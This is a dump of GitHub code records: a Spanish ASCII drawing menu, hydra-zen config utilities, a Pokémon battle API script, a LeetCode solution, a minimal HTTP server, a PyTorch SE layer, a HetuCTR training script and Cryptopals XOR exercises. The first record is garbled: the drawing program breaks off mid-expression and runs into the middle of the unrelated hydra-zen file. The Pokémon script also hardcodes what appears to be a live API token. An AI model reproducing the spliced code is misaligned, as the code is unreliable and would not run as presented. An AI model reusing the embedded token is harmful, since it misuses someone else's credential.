+{"seq_id":"4826425247","text":"import os\r\ndef cerrarprograma():\r\n os.system(\"clear\")\r\n\r\ntabla = []\r\nalto = 82\r\ncont1=0\r\nlargo = 42\r\nfor x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n else:\r\n tabla.append(\" \")\r\n matriz= ''.join(tabla)\r\n print(matriz)\r\n tabla=[]\r\nprint(\"MENU\")\r\nprint()\r\nprint(\"1.Agregar una línea\")\r\nprint()\r\nprint(\"2.Agregar una elipse o círculo\")\r\nprint()\r\nprint(\"3.Agregar un rectángulo o cuadrado\")\r\nprint()\r\nprint(\"4.Agregar un triángulo\")\r\nprint()\r\nprint(\"5.Mostrar un Dibujo\")\r\nprint()\r\nprint(\"6.Leer un dibujo\")\r\nprint()\r\nprint(\"7.Grabar un dibujo\")\r\nprint()\r\nprint(\"0.Cerrar programa\")\r\nprint()\r\nn = int(input(\"Selecciona una opción: \"))\r\nif n==0:\r\n cerrarprograma()\r\nif n == 1:\r\n print(\"Por el momento solo funciona en diagonales con punto x y punto y iguales. Próximamente mejorará.\")\r\n x1 = int(input(\"¿Cuál es el x del primer punto?: \"))\r\n while not -1 < x1 < 83:\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x1 = int(input(\"¿Cuál es el primer punto?: \"))\r\n print(\"Listo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n while not -1 < y1 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n print(\"Listo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n while not -1 < x2 < 83 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n print(\"Listo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n while not -1 < y2 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n print(\"Listo\")\r\n for x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n elif x==x1 and y==y1:\r\n tabla.append('x')\r\n elif x==x2 and y==y2:\r\n tabla.append('x')\r\n elif y2==y or y1==y:\r\n tabla.append(' ')\r\n elif x2>x>x1 and y1>y2:\r\n tabla.append(' ')\r\n elif x==y and x\"\nKNOWN_MUTABLE_TYPES: Set[\n Union[Type[List[Any]], Type[Dict[Any, Any]], Type[Set[Any]]]\n] = {list, dict, set}\n\nT = TypeVar(\"T\")\n\n\n# The typeshed definition of `field` has an inaccurate annotation:\n# https://github.com/python/typeshed/blob/b9e1d7d522fe90b98e07d43a764bbe60216bc2c4/stdlib/dataclasses.pyi#L109\n# This makes it impossible for `make_dataclass` to by type-correct in the eyes of\n# static checkers. See https://github.com/microsoft/pyright/issues/1680 for discussion.\n#\n# We happen to make rather heavy use of `make_dataclass`, thus we..*sigh*.. we provide\n# our own overloads for `field`.\n@overload # `default` and `default_factory` are optional and mutually exclusive.\ndef field(\n *,\n default: Any,\n init: bool = ...,\n repr: bool = ...,\n hash: Optional[bool] = ...,\n compare: bool = ...,\n metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]: # pragma: no cover\n ...\n\n\n@overload\ndef field(\n *,\n default_factory: Callable[[], Any],\n init: bool = ...,\n repr: bool = ...,\n hash: Optional[bool] = ...,\n compare: bool = ...,\n metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]: # pragma: no cover\n ...\n\n\ndef field(\n *,\n default: Any = MISSING,\n default_factory: Union[Callable[[], Any], Any] = MISSING,\n init: bool = True,\n repr: bool = True,\n hash: Optional[bool] = None,\n compare: bool = True,\n metadata: Optional[Mapping[Any, Any]] = None,\n) -> Field[Any]:\n if default is MISSING:\n return cast(\n Field[Any],\n _field(\n default_factory=default_factory,\n init=init,\n repr=repr,\n hash=hash,\n compare=compare,\n metadata=metadata,\n ),\n )\n else:\n return cast(\n Field[Any],\n _field(\n default=default,\n init=init,\n repr=repr,\n hash=hash,\n compare=compare,\n metadata=metadata,\n ),\n )\n\n\ndef safe_name(obj: Any, repr_allowed: bool = True) -> str:\n \"\"\"Tries to get a descriptive name for an object. Returns '`\n instead of raising - useful for writing descriptive/dafe error messages.\"\"\"\n\n if hasattr(obj, \"__name__\"):\n return obj.__name__.replace(\"\", \"lambda\")\n\n if repr_allowed and hasattr(obj, \"__repr__\"):\n return repr(obj).replace(\"\", \"lambda\")\n\n return UNKNOWN_NAME\n\n\ndef is_classmethod(obj: Any) -> bool:\n \"\"\"\n https://stackoverflow.com/a/19228282/6592114\n\n Credit to: Martijn Pieters\n License: CC BY-SA 4.0 (free to copy/redistribute/remix/transform)\"\"\"\n\n if not inspect.ismethod(obj):\n return False\n\n bound_to = getattr(obj, \"__self__\", None)\n if not isinstance(bound_to, type):\n # must be bound to a class\n return False\n name = safe_name(obj)\n\n if name == UNKNOWN_NAME: # pragma: no cover\n return False\n\n for cls in bound_to.__mro__:\n descriptor = vars(cls).get(name)\n if descriptor is not None:\n return isinstance(descriptor, classmethod)\n return False # pragma: no cover\n\n\ndef building_error_prefix(target: Any) -> str:\n return f\"Building: {safe_name(target)} ..\\n\"\n\n\nNoneType = type(None)\n\n\ndef is_interpolated_string(x: Any) -> TypeGuard[InterpStr]:\n # This is only a necessary check – not a sufficient one – that `x`\n # is a valid interpolated string. We do not verify that it rigorously\n # satisfies omegaconf's grammar\n return isinstance(x, str) and len(x) > 3 and x.startswith(\"${\") and x.endswith(\"}\")\n\n\ndef check_suspicious_interpolations(\n validated_wrappers: Sequence[Any], zen_meta: Mapping[str, Any], target: Any\n):\n \"\"\"Looks for patterns among zen_meta fields and interpolated fields in\n wrappers. Relative interpolations pointing to the wrong level will produce\n a warning\"\"\"\n for _w in validated_wrappers:\n if is_interpolated_string(_w):\n _lvl = _w.count(\".\") # level of relative-interp\n _field_name = _w.replace(\".\", \"\")[2:-1]\n if (\n _lvl\n and _field_name in zen_meta\n and _lvl != (1 if len(validated_wrappers) == 1 else 2)\n ):\n _expected = II(\n \".\" * (1 if len(validated_wrappers) == 1 else 2) + _field_name\n )\n\n warnings.warn(\n building_error_prefix(target)\n + f\"A zen-wrapper is specified via the interpolated field, {_w},\"\n f\" along with the meta-field name {_field_name}, however it \"\n f\"appears to point to the wrong level. It is likely you should \"\n f\"change {_w} to {_expected}\"\n )\n yield _expected\n\n\ndef valid_defaults_list(hydra_defaults: Any) -> bool:\n \"\"\"\n Raises\n ------\n HydraZenValidationError: Duplicate _self_ entries\"\"\"\n if not isinstance(hydra_defaults, (list, ListConfig)):\n return False\n\n has_self = False\n for item in hydra_defaults:\n if item == \"_self_\":\n if not has_self:\n has_self = True\n continue\n raise HydraZenValidationError(\n \"`hydra_defaults` cannot have more than one '_self_' entry\"\n )\n\n if isinstance(item, (dict, DictConfig)):\n for k, v in item.items():\n if not isinstance(k, str):\n return False\n\n if (\n not isinstance(v, (str, list, ListConfig))\n and v is not None\n and v != MISSING\n ):\n return False\n elif isinstance(item, str):\n continue\n elif is_dataclass(item):\n # no validation here\n continue\n else:\n return False\n\n if not has_self:\n warnings.warn(\n \"Defaults list is missing `_self_`. See https://hydra.cc/docs/upgrades/1.0_to_1.1/default_composition_order for more information\",\n category=UserWarning,\n )\n return True\n\n\ndef merge_settings(\n user_settings: Optional[ZenConvert], default_settings: AllConvert\n) -> AllConvert:\n \"\"\"Merges settings as `default_settings.update(user_settings)`\"\"\"\n if user_settings is not None and not isinstance(user_settings, Mapping):\n raise TypeError(\n f\"`zen_convert` must be None or Mapping[str, Any] (e.g. dict). Got {user_settings}\"\n )\n settings = default_settings.copy()\n if user_settings:\n for k, v in user_settings.items():\n if k not in convert_types:\n raise ValueError(\n f\"The key `{k}` is not a valid zen_convert setting. The available settings are: {', '.join(sorted(convert_types))}\"\n )\n if not isinstance(v, convert_types[k]):\n raise TypeError(\n f\"Setting {k}={v} specified a value of the wrong type. Expected type: {convert_types[k].__name__}\"\n )\n settings[k] = v\n return settings\n\n\n_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n DataclassOptions.__required_keys__ | DataclassOptions.__optional_keys__\n)\n\n_STRICT_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n StrictDataclassOptions.__required_keys__ | StrictDataclassOptions.__optional_keys__\n)\n_STRICT_DATACLASS_OPTION_KEYS.copy()\n\n\ndef parse_dataclass_options(\n options: Mapping[str, Any], include_module: bool = True\n) -> DataclassOptions:\n \"\"\"\n Ensures `options` adheres to `DataclassOptions` and merges hydra-zen defaults\n for missing options.\n\n All valid `@dataclass`/`make_dataclass` options are supported, even for features\n introduced in later versions of Python. This function will remove valid options\n that are not supported for by the current Python version.\n\n Parameters\n ----------\n options : Mapping[str, Any]\n User-specified options for `zen_dataclass` to be validated.\n\n Returns\n -------\n DataclassOptions\n\n Examples\n --------\n >>> parse_dataclass_options({})\n {'unsafe_hash': True}\n\n >>> parse_dataclass_options({\"unsafe_hash\": False, \"cls_name\": \"Foo\"})\n {'unsafe_hash': False, 'cls_name': 'Foo'}\n\n >>> parse_dataclass_options({\"moo\": 1})\n ValueError: moo is not a valid dataclass option.\n\n Options that are supported by `make_dataclass` for later versions of\n Python are ignored/removed automatically by this function. E.g. the following\n Python 3.10+ option has the following behavior in Python 3.9:\n\n >>> parse_dataclass_options({\"slots\": False})\n {'unsafe_hash': True}\n \"\"\"\n if not isinstance(options, Mapping):\n raise ValueError(\n f\"`zen_dataclass_options` is expected to be `None` or dict[str, bool]. Got \"\n f\"{options} (type: {type(options)}).\"\n )\n\n merged = DEFAULT_DATACLASS_OPTIONS.copy()\n\n for name, val in options.items():\n if name in UNSUPPORTED_DATACLASS_OPTIONS:\n continue\n elif name not in _DATACLASS_OPTION_KEYS:\n raise ValueError(f\"{name} is not a valid dataclass option.\")\n\n if name == \"module\":\n if val is not None and (\n not isinstance(val, str)\n or not all(\n v.isidentifier() and not iskeyword(v) for v in val.split(\".\")\n )\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid module name, got {val}\"\n )\n\n elif name == \"cls_name\":\n if val is not None and (not isinstance(val, str) or not val.isidentifier()):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid identifier, got {val}\"\n )\n elif name == \"bases\":\n if not isinstance(val, Iterable) or any(\n not (is_dataclass(_b) and isinstance(_b, type)) for _b in val\n ):\n raise TypeError(\n f\"dataclass option `{name}` must be a tuple of dataclass types\"\n )\n elif name == \"namespace\":\n if not isinstance(val, Mapping) or any(\n not isinstance(v, str) or not v.isidentifier() for v in val\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a mapping with string-valued keys \"\n f\"that are valid identifiers. Got {val}.\"\n )\n elif name == \"target\":\n if not isinstance(val, str) or not all(\n x.isidentifier() for x in val.split(\".\")\n ):\n raise TypeError(\n f\"dataclass option `target` must be a string and an import path, \"\n f\"got {val!r}\"\n )\n elif not isinstance(val, bool):\n raise TypeError(\n f\"dataclass option `{name}` must be of type `bool`. Got {val} \"\n f\"(type: {type(val)})\"\n )\n merged[name] = val\n if (\n include_module\n and \"module\" not in merged\n and \"module\" in _STRICT_DATACLASS_OPTION_KEYS\n ): # pragma: no cover\n # For Python 3.12+ we want the default module to\n # remain \"types\" rather than being inferred as some\n # internal hydra-zen module.\n merged[\"module\"] = \"types\"\n return merged\n\n\ndef parse_strict_dataclass_options(\n options: Mapping[str, Any]\n) -> TypeGuard[StrictDataclassOptions]:\n return (\n options.keys() <= _STRICT_DATACLASS_OPTION_KEYS\n and StrictDataclassOptions.__required_keys__ <= options.keys()\n )\n\n\n_HYDRA_CONVERT_OPTIONS = (\n {\"none\", \"partial\", \"all\", \"object\"}\n if HYDRA_SUPPORTS_OBJECT_CONVERT\n else {\"none\", \"partial\", \"all\"}\n)\n\n\ndef validate_hydra_options(\n hydra_recursive: Optional[bool] = None,\n hydra_convert: Optional[Literal[\"none\", \"partial\", \"all\", \"object\"]] = None,\n) -> None:\n if hydra_recursive is not None and not isinstance(hydra_recursive, bool):\n raise TypeError(\n f\"`hydra_recursive` must be a boolean type, got {hydra_recursive}\"\n )\n\n if hydra_convert is not None and hydra_convert not in _HYDRA_CONVERT_OPTIONS:\n raise ValueError(\n f\"`hydra_convert` must be 'none', 'partial',\"\n f\"{' object' if HYDRA_SUPPORTS_OBJECT_CONVERT else ''} or 'all', got: \"\n f\"{hydra_convert}\"\n )\n","repo_name":"mit-ll-responsible-ai/hydra-zen","sub_path":"src/hydra_zen/structured_configs/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"18"}
+{"seq_id":"31135136275","text":"import requests\r\nimport json\r\ntoken = '181e9195a049ec50a01032126911a7f5'\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"name\": \"Opponent\",\r\n \"photo\": \"https://static.wikia.nocookie.net/pokemon/images/2/21/001Bulbasaur.png\"\r\n})\r\npokemon_id = response.json()['id']\r\nresponse_change = requests.put('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token}, json ={\r\n \"pokemon_id\": pokemon_id,\r\n \"name\": \"Opponent 78\",\r\n \"photo\": \"\" \r\n })\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons/trainers/add_pokeball',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"pokemon_id\": \"3186\"\r\n})\r\nprint (response_change.text) ","repo_name":"nikita-shevchukov/python_autotests","sub_path":"test/PythonProjects/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"43475328522","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: xiezizhe\n@Date: 26/2/2020 上午11:13\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums is None:\n return 0\n if len(nums) <= 1:\n return len(nums)\n cur_idx, next_idx = 0, 1\n while next_idx < len(nums):\n if nums[next_idx] == nums[cur_idx]:\n while next_idx < len(nums) and nums[next_idx] == nums[cur_idx]:\n next_idx += 1\n if next_idx < len(nums):\n nums[cur_idx + 1] = nums[next_idx]\n else:\n break\n cur_idx += 1\n next_idx += 1\n nums[cur_idx] = nums[next_idx - 1]\n\n return cur_idx + 1\n\n\nif __name__ == '__main__':\n l = [1, 1, 1, 1, 1, 2, 2, 3, 4, 5, 6]\n s = Solution()\n print(s.removeDuplicates(l))\n print(l)\n","repo_name":"forrest0402/leetcode","sub_path":"python/26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"29705705245","text":"import http.server\nfrom socketserver import ThreadingMixIn\nimport threading\nimport json, re\n\nclass ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):\n allow_reuse_address = True\n def shutdown(self):\n self.socket.close()\n http.server.HTTPServer.shutdown(self)\n\ndef route(path):\n def _route(f):\n setattr(f, '__route__', path)\n return f\n return _route\n\ndef read_params(path):\n query = path.split('?')\n if len(query) > 1:\n query = query[1].split('&')\n return dict(map(lambda x: x.split('='), query))\n\ndef get(req_handler, routes):\n for name, handler in routes.__class__.__dict__.items():\n if hasattr(handler, \"__route__\"):\n if None != re.search(handler.__route__, req_handler.path):\n req_handler.send_response(200)\n req_handler.send_header('Content-Type', 'application/json')\n req_handler.send_header('Access-Control-Allow-Origin', '*')\n req_handler.end_headers()\n params = read_params(req_handler.path)\n data = json.dumps(handler(routes, params)) + '\\n'\n req_handler.wfile.write(bytes(data, encoding = 'utf-8'))\n return\n\ndef run(routes, host = '0.0.0.0', port = 8080):\n class RequestHandler(http.server.BaseHTTPRequestHandler):\n def log_message(self, *args, **kwargs):\n pass\n def do_GET(self):\n get(self, routes)\n server = ThreadedHTTPServer((host, port), RequestHandler)\n thread = threading.Thread(target = server.serve_forever)\n thread.daemon = True\n thread.start()\n print (f\"HTTP server started on port {port}\")\n","repo_name":"paramtt/twitch-custom","sub_path":"server/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3971502820","text":"import torch.nn as nn\n\nfrom .registry import PLUGIN_LAYERS\n\n\n@PLUGIN_LAYERS.register_module()\nclass Dropout2d_(nn.Dropout2d):\n \"\"\" To fit the plugin interface\n \"\"\"\n\n def __init__(self, in_channels, p, inplace=True):\n super(Dropout2d_, self).__init__(p, inplace=inplace)\n\n\n@PLUGIN_LAYERS.register_module()\nclass SELayer(nn.Module):\n _abbr_ = 'se'\n def __init__(self, in_channels, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(in_channels, in_channels // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(in_channels // reduction, in_channels, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n","repo_name":"tfwu/iVMCL-Release","sub_path":"mmcv/mmcv/cnn/bricks/plugin_ivmcl.py","file_name":"plugin_ivmcl.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"}
+{"seq_id":"3830363981","text":"import numpy as np\r\nimport cv2\r\n\r\n\r\n# Open Camera\r\ncapture = cv2.VideoCapture(0)\r\n\r\nwhile capture.isOpened():\r\n\r\n # Capture frames from the camera\r\n ret, frame = capture.read()\r\n\r\n # Get hand data from the rectangle sub window\r\n cv2.rectangle(frame, (100, 100), (300, 300), (0, 255, 0), 0)\r\n crop_image = frame[100:300, 100:300]\r\n\r\n # Apply Gaussian blur\r\n blur = cv2.GaussianBlur(crop_image, (3, 3), 0)\r\n\r\n # Change color-space from BGR -> HSV\r\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\r\n\r\n # Create a binary image with where white will be skin colors and rest is black\r\n mask2 = cv2.inRange(hsv, np.array([2, 0, 0]), np.array([20, 255, 255]))\r\n cv2.imshow(\"image\",mask2);\r\n\r\n # Kernel for morphological transformation\r\n kernel = np.ones((5, 5))\r\n\r\n # Apply morphological transformations to filter out the background noise\r\n dilation = cv2.dilate(mask2, kernel, iterations=1)\r\n erosion = cv2.erode(dilation, kernel, iterations=1)\r\n\r\n # Apply Gaussian Blur and Threshold\r\n filtered = cv2.GaussianBlur(erosion, (3, 3), 0)\r\n ret, thresh = cv2.threshold(filtered, 127, 255, 0)\r\n#####\r\n #cv2.imshow(\"Threshold\",thresh)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()","repo_name":"RashmithaEttadi/HandGestureRecognition","sub_path":"pg2.py","file_name":"pg2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4099135257","text":"import hetu as ht\nfrom hetu.launcher import launch\nfrom hetu import init\nfrom hetu.gpu_ops.SharedTable import SharedTableOp\nfrom hetu.communicator.mpi_nccl_comm import ncclDataType_t, ncclRedOp_t\n\nfrom models.hetuctr_data import load_dataset\nfrom models.hetuctr_models import WDL, DCN, DFM\n\nimport os.path as osp\nimport numpy as np\nimport yaml\nimport time\nimport argparse\nfrom sklearn import metrics\n\ndef comm_sync_data(comm, *args):\n array = ht.array(args, ht.cpu())\n comm.dlarrayNcclAllReduce(array, array, ncclDataType_t.ncclFloat32, ncclRedOp_t.ncclSum, comm.stream)\n comm.stream.sync()\n return array.asnumpy() / comm.nRanks.value\n\ndef worker(args):\n def train(iterations, auc_enabled=False):\n localiter = range(iterations)\n train_loss = []\n train_acc = []\n if auc_enabled:\n train_auc = []\n for it in localiter:\n loss_val, predict_y, y_val, _ = executor.run('train', convert_to_numpy_ret_vals=True)\n if y_val.shape[1] == 1: # for criteo case\n acc_val = np.equal(\n y_val,\n predict_y > 0.5).astype(float)\n else:\n acc_val = np.equal(\n np.argmax(y_val, 1),\n np.argmax(predict_y, 1)).astype(float)\n train_loss.append(loss_val[0])\n train_acc.append(acc_val)\n if auc_enabled:\n train_auc.append(metrics.roc_auc_score(y_val, predict_y))\n if auc_enabled:\n return np.mean(train_loss), np.mean(train_acc), np.mean(train_auc)\n else:\n return np.mean(train_loss), np.mean(train_acc), 0\n def validate(iterations):\n localiter = range(iterations)\n test_loss = []\n test_acc = []\n test_auc = []\n for it in localiter:\n loss_val, test_y_predicted, y_test_val = executor.run('validate', convert_to_numpy_ret_vals=True)\n if y_test_val.shape[1] == 1: # for criteo case\n correct_prediction = np.equal(\n y_test_val,\n test_y_predicted > 0.5).astype(float)\n else:\n correct_prediction = np.equal(\n np.argmax(y_test_val, 1),\n np.argmax(test_y_predicted, 1)).astype(float)\n test_loss.append(loss_val[0])\n test_acc.append(correct_prediction)\n test_auc.append(metrics.roc_auc_score(y_test_val, test_y_predicted))\n return np.mean(test_loss), np.mean(test_acc), np.mean(test_auc)\n\n def get_shard(data):\n part_size = data.shape[0] // nrank\n start = part_size * rank\n end = start + part_size if rank != nrank - 1 else data.shape[0]\n return data[start:end]\n\n def get_partitioned_shard(data):\n if data_arr is not None:\n return data[np.where(data_arr==rank)]\n else:\n return get_shard(data)\n\n batch_size = args.batch_size\n\n nrank = comm.nRanks.value\n\n dense, sparse, labels = load_dataset(args.dataset, val=False)\n has_dense_feature = dense is not None\n dense_input = [[get_partitioned_shard(dense), batch_size, 'train']] if has_dense_feature else None\n sparse_input = [ht.Dataloader(get_partitioned_shard(sparse).astype(np.int64), batch_size, 'train', use_numpy=True)]\n y_ = [[get_partitioned_shard(labels), batch_size, 'train']]\n\n if args.val:\n val_dense, val_sparse, val_labels = load_dataset(args.dataset, val=True)\n if has_dense_feature:\n dense_input.append([get_shard(val_dense), batch_size, 'validate'])\n sparse_input.append(ht.Dataloader(get_shard(val_sparse).astype(np.int64), batch_size, 'validate', use_numpy=True))\n y_.append([get_shard(val_labels), batch_size, 'validate'])\n\n dense_input = ht.dataloader_op(dense_input) if has_dense_feature else None\n sparse_input = ht.dataloader_op(sparse_input)\n y_ = ht.dataloader_op(y_)\n\n print(\"Data loaded.\")\n models = {\"wdl\" : WDL, \"dcn\" : DCN, \"dfm\" : DFM}\n loss, prediction, y_, train_op = models[args.model](args.dataset, dense_input, sparse_input, y_, args.embed_dim, rank, nrank, device_id,\n args.bound, root_arr, storage_arr)\n\n eval_nodes = {'train': [loss, prediction, y_, train_op]}\n if args.val:\n print('Validation enabled...')\n eval_nodes['validate'] = [loss, prediction, y_]\n executor = ht.Executor(eval_nodes, ctx=ht.gpu(device_id), comm_mode=\"AllReduce\" if nrank > 1 else None, seed=123, log_path='./logs/')\n\n if rank == 0:\n log_file = open(args.output, 'w')\n for ep in range(args.iter // args.log_every):\n ep_st = time.time()\n train_loss, train_acc, train_auc = train(args.log_every)\n ep_en = time.time()\n train_time, train_loss, train_acc, train_auc = comm_sync_data(comm, ep_en - ep_st, train_loss, train_acc, train_auc)\n if rank==0:\n printstr = \"TRAIN %d: loss %.4f acc %.4f time %.4f speed %d\" % (ep * args.log_every, train_loss, train_acc, train_time, args.log_every*batch_size/train_time)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n if args.val and ep > 0 and ep % (args.eval_every // args.log_every) == 0:\n val_loss, val_acc, val_auc = validate(executor.get_batch_num('validate'))\n val_loss, val_acc, val_auc = comm_sync_data(comm, val_loss, val_acc, val_auc)\n if rank==0:\n printstr = \"EVAL %d: val_loss %.4f val_acc %.4f val_auc %.4f\" % (ep * args.log_every, val_loss, val_acc, val_auc)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str, required=True, help=\"[criteo avazu company]\")\n parser.add_argument(\"--model\", type=str, required=True, help=\"[wdl dcn dfm]\")\n parser.add_argument(\"--val\", action=\"store_true\", help=\"whether to use validation\")\n parser.add_argument(\"--bound\", type=int, default=10, help=\"cache bound\")\n parser.add_argument(\"--batch_size\", type=int, default=128, help=\"batch size\")\n parser.add_argument(\"--embed_dim\", type=int, default=128, help=\"embedding dim\")\n parser.add_argument(\"--iter\", type=int, default=10000, help=\"nnumber of iteration\")\n parser.add_argument(\"--log_every\", type=int, default=200)\n parser.add_argument(\"--eval_every\", type=int, default=10000)\n parser.add_argument(\"--store_rate\", type=float, default=0.01)\n parser.add_argument(\"--partition\", type=str, default=None)\n parser.add_argument(\"--output\", type=str, default=\"hetuctr.log\")\n args = parser.parse_args()\n\n comm, device_id = ht.mpi_nccl_init()\n rank = comm.myRank.value\n if args.partition:\n args.partition = osp.normpath(osp.expanduser(args.partition))\n assert osp.exists(args.partition)\n partition = np.load(args.partition)\n data_arr = partition[\"data_partition\"]\n root_arr = partition[\"embed_partition\"]\n storage_arr = partition[str(rank)]\n storage_arr = storage_arr[:int(args.store_rate * len(storage_arr))]\n storage_arr = np.concatenate([np.where(root_arr==rank)[0], storage_arr])\n else:\n data_arr, root_arr, storage_arr = None, None, None\n\n worker(args)\n ht.mpi_nccl_finish(comm)\n","repo_name":"Hsword/SIGMOD2022_HET-GMP","sub_path":"examples/hetuctr.py","file_name":"hetuctr.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"14619488528","text":"import base64\r\nimport re\r\nimport codecs\r\n\r\ndef convert_hex_to_base64(str=\"cXVlc3Rpb24z\"):\r\n return base64.b64encode(str)\r\n\r\n\r\ndef fixed_xor(str1=\"abcdef\", str2=\"qwerty\"):\r\n str_tmp = []\r\n for i in range(0, len(str1)):\r\n str_tmp += [chr(ord(str1[i]) ^ ord(str2[i]))]\r\n str_tmp = \"\".join(str_tmp)\r\n return codecs.encode(str_tmp)\r\n\r\n\r\ndef single_byte_xor_cipher(input_hex_str=\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"):\r\n highest_score = 0\r\n best_result = ''\r\n best_key = None\r\n\r\n # 转换为字节列表\r\n byte_array = bytearray.fromhex(input_hex_str)\r\n\r\n for i in range(256): # 尝试每个可能的key值\r\n # 解密XOR\r\n decoded_bytes = bytes([b ^ i for b in byte_array])\r\n # 仅计算小写字母的数量,因为大写字母的频率通常较低\r\n score = sum(ord('a') <= byte <= ord('z') for byte in decoded_bytes)\r\n\r\n # 更新最佳得分和对应的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_bytes.decode('latin1') # 解码为字符串,假设是latin1编码\r\n best_key = chr(i)\r\n\r\n return best_key, best_result\r\n\r\n\r\n# print(single_byte_xor_cipher())\r\nfrom collections import Counter\r\n\r\n\r\ndef detect_single_character_xor(file_name=\"4.txt\"):\r\n highest_score = 0\r\n best_result = ''\r\n key_candidate = ''\r\n original_cipher = ''\r\n\r\n with open(file_name, \"r\") as file:\r\n for line in file:\r\n hex_string = line.strip() # 去除可能的换行符和空白符\r\n for key_value in range(256): # 扩展至256,因为单字节XOR的可能值有256个\r\n # XOR每个可能的字符,并解码成ASCII\r\n decoded_chars = [chr(key_value ^ int(byte_pair, 16)) for byte_pair in re.findall('.{2}', hex_string)]\r\n decoded_string = ''.join(decoded_chars)\r\n\r\n # 使用Counter来计算每个字符的出现频率\r\n frequency = Counter(decoded_string.lower()) # 将字符串转换为小写进行统计\r\n score = sum(frequency.get(c, 0) for c in 'etaoin shrdlu') # 基于字母频率给字符串打分\r\n\r\n # 更新得到更高分的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_string\r\n key_candidate = chr(key_value)\r\n original_cipher = hex_string\r\n\r\n return original_cipher, key_candidate, best_result\r\n\r\n\r\nprint(\"cXVlc3Rpb24z\")\r\nprint(fixed_xor())\r\nprint(single_byte_xor_cipher())\r\nprint(detect_single_character_xor())\r\n","repo_name":"HumboldtC/XD_CRYPTO","sub_path":"EXP1/3_Cryptopals_set1.py","file_name":"3_Cryptopals_set1.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
